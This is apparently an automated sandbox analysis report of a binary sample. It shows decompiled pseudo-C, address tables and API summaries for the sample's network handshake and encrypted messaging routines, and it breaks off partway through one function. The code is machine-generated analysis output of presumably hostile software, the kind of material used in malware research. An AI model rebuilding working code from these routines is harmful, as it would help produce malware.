    0x003a5e06
    0x003a5e09
    0x003a5e0b
    0x00000000
    0x003a5e11
    0x003a5e11
    0x003a5e1e
    0x003a5e23
    0x003a5e23
    0x003a5e2d
    0x003a5e2d
    0x003a5e2f
    0x003a5e35
    0x003a5e3c
    0x003a5e47
    0x003a5e47
    0x003a5e55
    0x003a5e5f
    0x003a5e5f
    0x003a5e6d
    0x003a5e6f
    0x003a608d
    0x003a608d
    0x003a6091
    0x003a6093
    0x003a6095
    0x003a609c
    0x003a609f
    0x003a60a8
    0x003a60ae
    0x003a60b1
    0x003a60b1
    0x003a60b2
    0x003a609c
    0x00000000
    0x003a5e75
    0x003a5e78
    0x003a5e7d
    0x003a5e81
    0x003a5e82
    0x003a5e84
    0x003a5e86
    0x00000000
    0x003a5e8c
    0x003a5e8e
    0x003a5e93
    0x003a5e95
    0x003a6086
    0x003a6088
    0x00000000
    0x003a5e9b
    0x003a5e9b
    0x003a5e9b
    0x003a5e9d
    0x003a5ea2
    0x003a5ea6
    0x003a5ea7
    0x003a5ea7
    0x003a5eb3
    0x003a5eb8
    0x003a5eb9
    0x003a5ebb
    0x00000000
    0x003a5ec1
    0x003a5ec9
    0x003a5ecf
    0x003a5ed0
    0x003a5ed2
    0x00000000
    0x003a5ed8
    0x003a5ed8
    0x003a5ee9
    0x003a5eed
    0x003a5ef1
    0x003a5ef3
    0x00000000
    0x003a5ef9
    0x003a5efa
    0x003a5f04
    0x003a5f08
    0x003a5f1a
    0x003a5f28
    0x003a5f2d
    0x003a5f2f
    0x003a5f39
    0x003a5f3f
    0x003a5f45
    0x003a5f5a
    0x003a5f62
    0x003a5f64
    0x003a6077
    0x003a607b
    0x003a6081
    0x00000000
    0x003a5f6a
    0x003a5f6e
    0x003a5f76
    0x003a5f7c
    0x003a5f8b
    0x003a5f94
    0x003a5f99
    0x003a5f9d
    0x003a5fa1
    0x003a5fa3
    0x00000000
    0x003a5fa9
    0x003a5faa
    0x003a5fb0
    0x003a5fb4
    0x003a5fb6
    0x003a5fbf
    0x003a5fc2
    0x003a5fce
    0x003a5ff2
    0x003a5ff4
    0x003a5ffc
    0x003a5ffe
    0x00000000
    0x003a6000
    0x003a6007
    0x003a6011
    0x003a6017
    0x003a601e
    0x003a6020
    0x00000000
    0x003a6022
    0x003a602e
    0x003a6030
    0x003a606b
    0x003a6072
    0x00000000
    0x003a6032
    0x003a6040
    0x003a6047
    0x003a6049
    0x00000000
    0x003a604b
    0x003a604b
    0x003a605b
    0x003a6063
    0x003a6065
    0x003a610f
    0x003a6118
    0x003a611e
    0x003a6123
    0x003a6125
    0x003a6127
    0x003a612e
    0x003a6131
    0x003a613a
    0x003a6140
    0x003a6143
    0x003a6143
    0x003a6144
    0x003a612e
    0x003a614b
    0x003a6156
    0x003a6161
    0x003a616c
    0x003a6177
    0x003a6182
    0x003a6188
    0x00000000
    0x00000000
    0x00000000
    0x003a6065
    0x003a6049
    0x003a6030
    0x003a6020
    0x003a5ffe
    0x003a5fa3
    0x003a5f64
    0x003a5ef3
    0x003a5ed2
    0x003a5ebb
    0x003a5e95
    0x003a5e86
    0x003a5e6f
    0x003a5de1
    0x003a5de1
    0x003a5de1
    0x00000000
    0x003a5de1
    0x003a5ddf
    0x003a5d63
    0x003a5d4f
    0x003a5d26
    0x003a6191

    APIs
    • memset.MSVCRT ref: 003A5C6B
      • Part of subcall function 003A50D5: htonl.WS2_32(?), ref: 003A513C
      • Part of subcall function 003A39C0: memset.MSVCRT ref: 003A39EE
    • getpeername.WS2_32(?), ref: 003A5D94
    • inet_ntoa.WS2_32(?), ref: 003A5D9E
    • sprintf.MSVCRT ref: 003A5DB6
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4C2D
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C61
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C80
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C90
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4CA5
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D4B
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D68
      • Part of subcall function 003A4BDF: sscanf.MSVCRT ref: 003A4D70
      • Part of subcall function 003AFF10: closesocket.WS2_32(?), ref: 003AFF12
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A40B3
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4122
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4165
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A41AC
      • Part of subcall function 003A4054: htonl.WS2_32(00000000), ref: 003A41C5
      • Part of subcall function 003A4054: getpeername.WS2_32(?,?,?), ref: 003A41EA
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A4226
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4233
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F19
      • Part of subcall function 003A3EE9: htons.WS2_32(00000000), ref: 003A3F31
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F7B
      • Part of subcall function 003A3EE9: htons.WS2_32(?), ref: 003A3FB2
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A52A3
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A52B8
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A52C4
      • Part of subcall function 003A528D: memcpy.MSVCRT ref: 003A52F9
      • Part of subcall function 003A528D: memset.MSVCRT ref: 003A5319
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A5343
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A536D
      • Part of subcall function 003A528D: memset.MSVCRT ref: 003A538C
      • Part of subcall function 003A528D: memcpy.MSVCRT ref: 003A53A3
      • Part of subcall function 003A528D: strtok.MSVCRT ref: 003A5444
      • Part of subcall function 003A528D: strtok.MSVCRT ref: 003A544C
      • Part of subcall function 003A528D: sscanf.MSVCRT ref: 003A5468
      • Part of subcall function 003A528D: sscanf.MSVCRT ref: 003A5485
      • Part of subcall function 003A528D: strtok.MSVCRT ref: 003A54E6
      • Part of subcall function 003A556B: getpeername.WS2_32(?,?,?), ref: 003A55D6
      • Part of subcall function 003A556B: inet_ntoa.WS2_32(?), ref: 003A55FE
      • Part of subcall function 003A556B: sprintf.MSVCRT ref: 003A5611
      • Part of subcall function 003A556B: strstr.MSVCRT ref: 003A5640
      • Part of subcall function 003A556B: strstr.MSVCRT ref: 003A5652
      • Part of subcall function 003A556B: memset.MSVCRT ref: 003A568F
      • Part of subcall function 003A556B: memcpy.MSVCRT ref: 003A56A1
      • Part of subcall function 003A56CF: memset.MSVCRT ref: 003A5700
      • Part of subcall function 003A56CF: htons.WS2_32(00000000), ref: 003A571E
      • Part of subcall function 003A56CF: htons.WS2_32(00000014), ref: 003A5726
      • Part of subcall function 003A56CF: memset.MSVCRT ref: 003A577A
      • Part of subcall function 003A56CF: htons.WS2_32(?), ref: 003A57B1
      • Part of subcall function 003A5853: CryptStringToBinaryA.CRYPT32(?,?,00000000,?,00000400,00000000,00000000), ref: 003A587E
    • memcpy.MSVCRT ref: 003A5F08
      • Part of subcall function 003A3B23: GetSystemTime.KERNEL32(?,?,?,?,003A5121,00000000,00001000), ref: 003A3B2D
      • Part of subcall function 003A3B23: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,003A5121,00000000,00001000), ref: 003A3B3B
      • Part of subcall function 003A3B23: __aulldiv.INT64 ref: 003A3B50
    • htonl.WS2_32(-00000096), ref: 003A5F3F
      • Part of subcall function 003AEA68: sscanf.MSVCRT ref: 003AEA7E
      • Part of subcall function 003AEA68: inet_addr.WS2_32(?), ref: 003AEA94
      • Part of subcall function 003AEA68: htons.WS2_32(?), ref: 003AEAA7
    • htons.WS2_32(00000000), ref: 003A5FAA
      • Part of subcall function 003A588E: memset.MSVCRT ref: 003A58F8
      • Part of subcall function 003A5949: memset.MSVCRT ref: 003A5979
      • Part of subcall function 003A5949: htons.WS2_32(E`:), ref: 003A5987
      • Part of subcall function 003A5949: memcpy.MSVCRT ref: 003A599B
      • Part of subcall function 003A5949: htons.WS2_32(?), ref: 003A5A0A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A4054, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 299network
    C-Code - Quality: 28%
    			E003A4054(intOrPtr* __ebx, void* __eflags) {
				void* _v8;
				char _v9;
				signed int _v16;
				intOrPtr _v29;
				char _v30;
				char _v32;
				void _v36;
				char _v40;
				intOrPtr _v52;
				char _v56;
				char _v84;
				void* _v88;
				char _v104;
				char _v124;
				char _v144;
				char _v164;
				void _v184;
				void _v204;
				void* __esi;
				int _t85;
				signed short _t88;
				void* _t91;
				void* _t102;
				intOrPtr _t104;
				intOrPtr* _t108;
				signed short _t111;
				void _t113;
				void* _t119;
				void* _t121;
				intOrPtr* _t141;
				signed int _t160;
				signed int _t164;
				intOrPtr* _t171;
				signed int _t172;
				void* _t175;
				void* _t189;
				void* _t202;
				int _t204;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t216;

				_t141 = __ebx;
				_v8 =  *0x3b8538(0x100000);
				if(E003AFD0B( *__ebx, 0x3b6670, 7) != 7 || E003AFB73( *__ebx,  &_v32, 5) != 5 || _v30 != 7) {
					L24:
					 *0x3b8540(_v8);
					_t85 = 0;
				} else {
					_t171 = __imp__#9;
					_t88 =  *_t171(_v29);
					_v9 = 0;
					_v16 = _t88 & 0x0000ffff;
					if(E003AFB73( *__ebx, _v8, _t88 & 0x0000ffff) != _v16) {
						goto L24;
					} else {
						_t91 = 0;
						if(_v16 <= 0) {
							goto L24;
						} else {
							do {
								if( *((char*)(_t91 + _v8)) == 3) {
									_v9 = 1;
								}
								_t91 = _t91 + 1;
							} while (_t91 < _v16);
							if(_v9 == 0 || E003AFB73( *_t141,  &_v32, 5) != 5 || _v30 != 0x81) {
								goto L24;
							} else {
								_v16 =  *_t171(_v29) & 0x0000ffff;
								if(E003AFB73( *_t141, _v8,  *_t171(_v29) & 0x0000ffff) != _v16 || E003AFB73( *_t141,  &_v32, 5) != 5 || _v30 != 0x82) {
									goto L24;
								} else {
									_t172 =  *_t171(_v29) & 0x0000ffff;
									if(E003AFB73( *_t141, _v8, _t172) != _t172 || E003AFB73( *_t141, _v8, 0x200) != 0x200) {
										goto L24;
									} else {
										_t102 = _v8;
										_t248 =  *((char*)(_t102 + 2)) - 8;
										if( *((char*)(_t102 + 2)) != 8) {
											goto L24;
										} else {
											memset(_t102, 0, 0x200);
											asm("movsw");
											asm("movsb");
											_t202 = _v8;
											_t104 = E003A3B23(_t248);
											__imp__#8(_t104);
											 *((intOrPtr*)(_t202 + 3)) = _t104;
											 *((short*)(_t202 + 7)) = 0x404;
											_t108 =  *_t141;
											_v40 = 0x10;
											__imp__#5( *_t108,  &_v56,  &_v40);
											if(_t108 != 0) {
												goto L24;
											} else {
												_t159 = _v52;
												 *((intOrPtr*)(_t202 + 9)) = _v52;
												if(E003AFD0B( *_t141, _t202, 0x200) != 0x200) {
													goto L24;
												} else {
													_t111 = E003AE937(_t159);
													_t175 = _v8;
													_t204 = 0;
													 *(_t141 + 4) = _t111;
													memset(_t175, 0, 0x200);
													_t113 =  *(_t141 + 4) & 0x0000ffff;
													__imp__#9(_t113);
													 *_t175 = _t113;
													 *((char*)(_t175 + 2)) = 5;
													do {
														 *((char*)(_t216 + _t204 - 0x20)) = E003AE8E0();
														_t204 = _t204 + 1;
													} while (_t204 < 0x14);
													_t160 = 5;
													memcpy(_t175 + 3,  &_v36, _t160 << 2);
													if(E003AFD0B( *_t141, _v8, 0x200) != 0x200 || E003AFB73( *_t141, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 6) {
														goto L24;
													} else {
														_t164 = 5;
														_t119 = memcpy( &_v204,  &_v36, _t164 << 2);
														_t121 = memcpy(memcpy( &_v184, _t119 + 3, 0 << 2),  &_v204, 0 << 2);
														_t189 = 0x29;
														 *((char*)(_t121 + 0x28)) = 0;
														E003A3B5C();
														_t211 = _v8;
														 *((char*)(_t211 + 0x28)) = 1;
														E003A3B5C(_t211, _t189,  &_v144);
														 *((char*)(_t211 + 0x28)) = 2;
														E003A3B5C(_t211, _t189,  &_v124);
														 *((char*)(_t211 + 0x28)) = 3;
														E003A3B5C(_t211, _t189,  &_v104);
														 *((char*)(_t211 + 0x28)) = 4;
														E003A3B5C(_t211, _t189,  &_v84);
														_t212 = _t141 + 8;
														 *0x3b8ab4(_t212, _t121, _t189,  &_v164, 0xa, 5);
														 *0x3b899c(_t212,  &_v144, 0x14);
														_t213 = _t141 + 0x7c;
														 *0x3b8ab4(_t213);
														 *0x3b899c(_t213,  &_v124, 0x14);
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														 *(_t141 + 0x120) =  *(_t141 + 0x120) & 0x00000000;
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														 *(_t141 + 0x134) =  *(_t141 + 0x134) & 0x00000000;
														 *0x3b8540(_v8);
														_t85 = 1;
														__eflags = 1;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t85;
			}













































    0x003a4054
    0x003a4074
    0x003a4082
    0x003a428b
    0x003a428e
    0x003a4294
    0x003a40aa
    0x003a40ad
    0x003a40b3
    0x003a40be
    0x003a40c2
    0x003a40cf
    0x00000000
    0x003a40d5
    0x003a40d5
    0x003a40da
    0x00000000
    0x003a40e0
    0x003a40e0
    0x003a40e7
    0x003a40e9
    0x003a40e9
    0x003a40ed
    0x003a40ee
    0x003a40f7
    0x00000000
    0x003a411f
    0x003a412d
    0x003a413a
    0x00000000
    0x003a4162
    0x003a4169
    0x003a4179
    0x00000000
    0x003a4199
    0x003a4199
    0x003a419c
    0x003a41a0
    0x00000000
    0x003a41a6
    0x003a41ac
    0x003a41b6
    0x003a41b8
    0x003a41b9
    0x003a41bf
    0x003a41c5
    0x003a41cb
    0x003a41d3
    0x003a41df
    0x003a41e1
    0x003a41ea
    0x003a41f2
    0x00000000
    0x003a41f8
    0x003a41f8
    0x003a4204
    0x003a4213
    0x00000000
    0x003a4215
    0x003a4215
    0x003a421a
    0x003a421e
    0x003a4222
    0x003a4226
    0x003a422b
    0x003a4233
    0x003a4239
    0x003a423c
    0x003a4240
    0x003a4245
    0x003a4249
    0x003a424a
    0x003a4251
    0x003a4258
    0x003a426f
    0x00000000
    0x003a429b
    0x003a429d
    0x003a42a9
    0x003a42c4
    0x003a42cf
    0x003a42d2
    0x003a42d6
    0x003a42db
    0x003a42ea
    0x003a42ee
    0x003a42fc
    0x003a4300
    0x003a430e
    0x003a4312
    0x003a4320
    0x003a4324
    0x003a432c
    0x003a4330
    0x003a4340
    0x003a4346
    0x003a434a
    0x003a4357
    0x003a4366
    0x003a4367
    0x003a4368
    0x003a4369
    0x003a4373
    0x003a4374
    0x003a4375
    0x003a4376
    0x003a4382
    0x003a4383
    0x003a4384
    0x003a4385
    0x003a4386
    0x003a4395
    0x003a4396
    0x003a4397
    0x003a4398
    0x003a4399
    0x003a43a0
    0x003a43a8
    0x003a43a8
    0x003a43a8
    0x003a426f
    0x003a4213
    0x003a41f2
    0x003a41a0
    0x003a4179
    0x003a413a
    0x003a40f7
    0x003a40da
    0x003a40cf
    0x003a43ad

    APIs
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    • htons.WS2_32(?), ref: 003A40B3
    • htons.WS2_32(?), ref: 003A4122
    • htons.WS2_32(?), ref: 003A4165
    • memset.MSVCRT ref: 003A41AC
      • Part of subcall function 003A3B23: GetSystemTime.KERNEL32(?,?,?,?,003A5121,00000000,00001000), ref: 003A3B2D
      • Part of subcall function 003A3B23: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,003A5121,00000000,00001000), ref: 003A3B3B
      • Part of subcall function 003A3B23: __aulldiv.INT64 ref: 003A3B50
    • htonl.WS2_32(00000000), ref: 003A41C5
    • getpeername.WS2_32(?,?,?), ref: 003A41EA
    • memset.MSVCRT ref: 003A4226
    • htons.WS2_32(?), ref: 003A4233
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A61AD, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182network
    C-Code - Quality: 37%
    			E003A61AD(intOrPtr* _a4, signed short _a8) {
				intOrPtr _v8;
				void _v24;
				char _v44;
				void _v160;
				void* __esi;
				void* _t47;
				signed int _t50;
				intOrPtr* _t54;
				short _t56;
				intOrPtr* _t57;
				void* _t75;
				void _t82;
				void* _t94;
				void* _t95;
				void* _t96;
				signed int _t97;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				intOrPtr* _t113;
				void* _t117;
				intOrPtr* _t118;

				_t109 = _a4;
				 *(_t109 + 0x468) =  *(_t109 + 0x468) & 0x00000000;
				 *(_t109 + 0x46c) =  *(_t109 + 0x46c) & 0x00000000;
				_t47 =  *0x3b8538(0x200);
				_t94 = _t47;
				_v8 =  *0x3b8538(0x200);
				memset(_t94, 0, 0x200);
				 *_t94 = 1;
				_t50 =  *(_t109 + 0x138) & 0x0000ffff;
				__imp__#9(_t50);
				 *(_t94 + 3) = _t50;
				sprintf( &_v24, ":%d", _a8 & 0x0000ffff);
				_t54 =  &_v24;
				_t95 = _t54 + 1;
				do {
					_t107 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t107 != 0);
				_t56 = _t54 - _t95 + 1;
				__imp__#9(_t56);
				 *((short*)(_t94 + 9)) = _t56;
				_t57 =  &_v24;
				_t96 = _t57 + 1;
				do {
					_t108 =  *_t57;
					_t57 = _t57 + 1;
				} while (_t108 != 0);
				_t17 = _t94 + 0xb; // 0xb
				memcpy(_t17,  &_v24, _t57 - _t96 + 1);
				_t18 = _t109 + 0x338; // 0x338
				_t117 = _t18;
				 *0x3b899c(_t117, _t94, 0x1fd);
				_t97 = 0x1d;
				memcpy( &_v160, _t117, _t97 << 2);
				 *0x3b8ab0( &_v160,  &_v44);
				_t113 = _a4;
				 *((intOrPtr*)(_t94 + 5)) = _v44;
				_t26 = _t113 + 0x450; // 0x450
				_t27 = _t113 + 0x440; // 0x440
				_t29 = _t113 + 0x420; // 0x420
				if(E003A3BB7(_t29, _t94, 0x1fd, _v8, _t27, _t26) == 0) {
					L12:
					 *0x3b8540(_t94);
					 *0x3b8540(_v8);
					_t75 = 0;
				} else {
					memset(_t94, 0, 0x200);
					_t118 = _t113;
					_t30 = _t118 + 0x120; // 0x120
					_t31 = _t118 + 0x110; // 0x110
					_t32 = _t94 + 3; // 0x3
					_t34 = _t118 + 0xf0; // 0xf0
					if(E003A3BB7(_t34, _v8, 0x1fd, _t32, _t31, _t30) == 0) {
						goto L12;
					} else {
						_t82 =  *(_t118 + 4) & 0x0000ffff;
						__imp__#9(_t82);
						 *_t94 = _t82;
						 *((char*)(_t94 + 2)) = 3;
						if(E003AFD0B( *_t118, _t94, 0x200) != 0x200 || E003AFB73( *_t118, _t94, 0x200) != 0x200 ||  *((char*)(_t94 + 2)) != 3) {
							goto L12;
						} else {
							_t85 = _t113;
							_t38 = _t85 + 0x134; // 0x134
							_t39 = _t85 + 0x124; // 0x124
							_t41 = _t94 + 3; // 0x3
							if(E003A3BB7(_t113 + 0x100, _t41, 0x1fd, _v8, _t39, _t38) == 0) {
								goto L12;
							} else {
								_t42 = _t113 + 0x464; // 0x464
								_t43 = _t113 + 0x454; // 0x454
								if(E003A3BB7(_t113 + 0x430, _v8, 0x1fd, _t94, _t43, _t42) == 0 ||  *_t94 != 4) {
									goto L12;
								} else {
									 *0x3b8540(_t94);
									 *0x3b8540(_v8);
									_t75 = 1;
								}
							}
						}
					}
				}
				return _t75;
			}

























    0x003a61b9
    0x003a61bc
    0x003a61c3
    0x003a61d0
    0x003a61d7
    0x003a61e6
    0x003a61e9
    0x003a61ee
    0x003a61f1
    0x003a61fc
    0x003a6202
    0x003a6214
    0x003a621a
    0x003a6220
    0x003a6223
    0x003a6223
    0x003a6225
    0x003a6226
    0x003a622c
    0x003a622e
    0x003a6234
    0x003a6238
    0x003a623b
    0x003a623e
    0x003a623e
    0x003a6240
    0x003a6241
    0x003a624d
    0x003a6251
    0x003a625b
    0x003a625b
    0x003a6262
    0x003a626a
    0x003a627c
    0x003a627e
    0x003a6287
    0x003a628a
    0x003a628d
    0x003a6294
    0x003a629e
    0x003a62b5
    0x003a6398
    0x003a6399
    0x003a63a2
    0x003a63a8
    0x003a62bb
    0x003a62c3
    0x003a62c8
    0x003a62ca
    0x003a62d1
    0x003a62d8
    0x003a62e4
    0x003a62f5
    0x00000000
    0x003a62fb
    0x003a62fb
    0x003a6300
    0x003a630b
    0x003a630e
    0x003a6324
    0x00000000
    0x003a633e
    0x003a633e
    0x003a6340
    0x003a6347
    0x003a6357
    0x003a636b
    0x00000000
    0x003a636d
    0x003a636d
    0x003a6374
    0x003a6391
    0x00000000
    0x003a63ac
    0x003a63ad
    0x003a63b6
    0x003a63be
    0x003a63be
    0x003a6391
    0x003a636b
    0x003a6324
    0x003a62f5
    0x003a63c5

    APIs
    • memset.MSVCRT ref: 003A61E9
    • htons.WS2_32(?), ref: 003A61FC
    • sprintf.MSVCRT ref: 003A6214
    • htons.WS2_32(?), ref: 003A622E
    • memcpy.MSVCRT ref: 003A6251
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • memset.MSVCRT ref: 003A62C3
    • htons.WS2_32(?), ref: 003A6300
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AF94E, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 212network
    APIs
      • Part of subcall function 003AED7D: memcpy.MSVCRT ref: 003AEDCE
      • Part of subcall function 003AED7D: memcpy.MSVCRT ref: 003AEDE1
      • Part of subcall function 003AED7D: memcpy.MSVCRT ref: 003AEE08
      • Part of subcall function 003AED7D: memcpy.MSVCRT ref: 003AEEA9
    • send.WS2_32(?,?,0000008B,00000000), ref: 003AFA0A
    • htons.WS2_32(00000301), ref: 003AFA3F
    • htons.WS2_32(00000001), ref: 003AFA47
    • send.WS2_32(?,?,00000006,00000000), ref: 003AFA5D
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AF4EF: recv.WS2_32(?,00000000,003AF7A5,00000000), ref: 003AF519
    • htons.WS2_32(?), ref: 003AFAEA
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039DCD0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 204
    C-Code - Quality: 60%
    			E0039DCD0(void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				short _v36;
				char _v44;
				intOrPtr _v48;
				char _v248;
				void* __ebx;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t84;
				char _t87;
				char _t88;
				char _t89;
				intOrPtr* _t91;
				intOrPtr* _t94;
				void* _t96;
				intOrPtr* _t100;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				intOrPtr _t131;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				void* _t163;

				_v28 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				E0039BB30( &_v44);
				_v48 = __ecx + 0x2c;
				E00393270(_t115, __ecx + 0x2c);
				_t159 = _a4;
